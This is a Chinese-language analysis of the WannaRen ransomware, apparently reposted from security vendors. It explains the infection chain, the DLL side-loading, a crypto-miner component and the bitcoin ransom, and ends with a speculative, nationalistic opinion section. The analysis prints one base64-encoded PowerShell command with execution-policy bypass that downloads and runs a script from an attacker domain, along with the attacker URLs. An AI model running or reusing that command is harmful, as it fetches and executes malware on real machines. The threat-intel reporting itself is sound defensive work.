WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

近日,有网友在社交媒体公开求助,称感染了一款名为 WannaRen 的新型勒索软件,部分文件被加密,需要支付 0.05 个比特币(约合 2500 元人民币)。

部分截图如下:
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

WannaRen 解密器图标伪装 Everything。
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒奇安信病毒响应中心在发现该情况后,第一时间发布了关于该 WannaRen 的样本解密器分析报告。
勒索软件的样本解密器截图:
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

攻击事件分析

根据线索,我们发现于 4 月 2 号天擎用户的拦截日志显示
powershell.exe -ep bypass -eSQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA 通过解码发现 powershell 会去下载并执行 cs.sslsngyl90.com 的脚本。实际上该域名会重定向至如下链接。http://cpu.sslsngyl90.com/vip.txt 从 Vip.txt 中的脚本可见攻击者会从 vim-cn.com 图床上下载 WINWORD.EXE 和 wwlib.dll,这种是典型的白加黑攻击手段。通过执行 WINWORD.EXE 即可加载于同一目录的 wwlib.dll。
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒紧接着 wwlib.dll 会去加载 Public 目录下的 you 程序,有趣的是,fm 文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

该程序需要会使用 busahk87909we 对 you 进行解密,解密后在内存加载 WannaRen 勒索软件
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒之后的事,跟开头的感染后的症状一致了。 除了上面的勒索情况外,Powershell 下载器还具有挖矿功能,其下载后会重命名为 nb.exe,其意指中文的WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒
有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。**WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为 WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。

WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

国货来了,易语言开发新型勒索病毒

**
**

近日,互联网上出现了一种后置名为“WannaRen”的新型比特币勒索病毒,并且实现了大规模传播。还在今日登上了微博热搜排行榜引发广泛争议。
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒
中了新型勒索病毒,被加密文件后缀名变为“. WannaRen”,并被索取 0.05 比特币作为解密赎金。现价合人民币 3000 左右,真太便宜了,国外的起步价都上万。
经火绒分析该病毒使用易语言编写。
先介绍一下易语言:
易语言(EPL)是一门以中文作为程序代码编程语言,其以“易”著称,创始人为吴涛。创造易语言的初衷是进行用中文来编写程序的实践,方便中国人以中国人的思维编写程序,并不用再去学习西方思维。易语言的诞生极大的降低了编程的门槛和学习的难度。
WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒
之前中国人学习编程,需要最少学会几百个单词,学英文,才能编程。用易语言 90% 以上中国人,原因很简单,中国人学英文费劲,国外人要用易语言编程首先要学中文,众所周知学中文顶难的,老外有学会中文要很长时间,这时间也可以学会最少两门编程语言,C 语言,python。所以用易语言不说全部吧,绝大部分都是中国人,由此推断用易语言写勒索病毒应当是懂中文的人。
前些天抓起来一个人写勒索病毒,用微信收赎金。用易语言写勒索病毒,几年前就出现了,作者吴涛还过写一篇文章《请不要给易语言贴标签 》,用什么编程语言写病毒,跟编程语言没有任何关系,简单,上手快,但是后来不用了,原因是国内杀病毒软件无差别提示病毒,就算正常的程序,就写一个对话框都提示是病毒。以 xxx,3 个数字的安全公司为首。实际 C 语言写的病毒更多,python 也有,为什么唯有易语言一刀切?本人个人看法就是狭隘与不自信。国外的编程工具病毒再多也不敢都不差别报病毒并杀掉,国产的编程语言得不到重视,随便查杀。现在都 2020 年,老外全都在学中文,孔子学院全球开花。让老外用中文编程有什么不行的?拿出民族自信,文化自信,崇洋媚外,不是什么好传统。
最近国内网络安全环境不太好,SRC 提交个高危漏洞给 10 元人民币,HW 各种费用结算不了,很多安全公司都勉强支撑。之前网络安全比较好的时候,都不会考虑灰色行业,勒索病毒行业都上十亿的收入,当前这个情况很难保证一些人会挺而走险。
勒索病毒之前的主力军不在中国,以西方国家小国与俄罗斯为主。如果国人取而代之成为主力军,可能的后果 .....
1,不光要勒索赎金,公开数据,还可以将数据倒卖了。2,国人对中国企业更了解,中国企业将损失更大
3,会抢占国外市场,价格能做到
还有什么后果,有什么看法,欢迎留言交流!
文章整合自:奇安信威胁情报中心、黑白之道

猜你喜欢这是赤裸裸打网络安全从业者的脸!昨晚停网后,我写了一段代码破解了隔壁小姐姐的 wifi 密码 ...有黑客正在通过骨干网络发动中间人攻击 国内多个省市区均受攻击影响怎样从零学起成为一名黑客?
安装输入法后用户主页被篡改,男子“种木马”牟利被判刑
数以万计的私人 Zoom 录像被无意上传到视频云 供任何人在线观看
支付宝账户需要重新实名认证?小心被钓鱼!
黑客入侵 Elasticsearch,破坏了超 1.5 万台服务器
境外 APT 组织利用深信服 VPN 漏洞入侵事件通告

WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒

WannaRen 勒索病毒分析:实属易语言开发新型勒索病毒你点的每个赞,我都认真当成了喜欢

来源链接:mp.weixin.qq.com